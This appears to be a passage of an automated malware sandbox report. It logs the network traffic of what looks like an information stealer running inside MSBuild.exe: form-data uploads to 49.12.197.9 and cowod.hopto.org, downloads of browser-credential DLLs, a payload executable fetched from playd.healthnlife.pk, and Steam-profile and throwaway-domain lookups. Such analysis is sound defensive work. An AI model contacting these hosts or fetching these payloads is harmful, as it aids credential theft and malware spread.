                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 130417Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGIIDBKEBFBGCAEBAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: advocachark.store
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: playd.healthnlife.pkCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 3177Connection: Keep-AliveCache-Control: no-cache
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,4_2_00406963
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                          Source: global trafficHTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: playd.healthnlife.pkCache-Control: no-cache
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.ste equals www.youtube.com (Youtube)
                          Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                          Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
                          Source: global trafficDNS traffic detected: DNS query: playd.healthnlife.pk
                          Source: global trafficDNS traffic detected: DNS query: soldiefieop.site
                          Source: global trafficDNS traffic detected: DNS query: questionsmw.store
                          Source: global trafficDNS traffic detected: DNS query: abnomalrkmu.site
                          Source: global trafficDNS traffic detected: DNS query: chorusarorp.site
                          Source: global trafficDNS traffic detected: DNS query: treatynreit.site
                          Source: global trafficDNS traffic detected: DNS query: snarlypagowo.site
                          Source: global trafficDNS traffic detected: DNS query: mysterisop.site
                          Source: global trafficDNS traffic detected: DNS query: absorptioniw.site
                          Source: global trafficDNS traffic detected: DNS query: advocachark.store
                          Source: global trafficDNS traffic detected: DNS query: cowod.hopto.org
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Http://cowod.hopto.org/form-data;
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                          Source: file.exe, a43486128347[1].exe.4.dr, CBFCFBFBFB.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.IDAAECKJDAK
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.IDAAECVWXYZ1234567890isposition:
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.CAEBAK
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.orgDAAEC--tent-Disposition:
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.orgDAAEContent-Disposition:
                          Source: file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hoptoAAKJDAK
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hoptoGCAEBAK
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: file.exe, a43486128347[1].exe.4.dr, CBFCFBFBFB.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: CBFCFBFBFB.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: file.exe, a43486128347[1].exe.4.dr, CBFCFBFBFB.exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.drString found in binary or memory: http://ocsp.digicert.com0A
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0N
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exe
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exeJ
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exej
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exeorm-data;
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                          Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: MSBuild.exe, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2201341180.000000001FE5D000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                          Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://49.12.197.9
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9//w
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/freebl3.dll
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/l
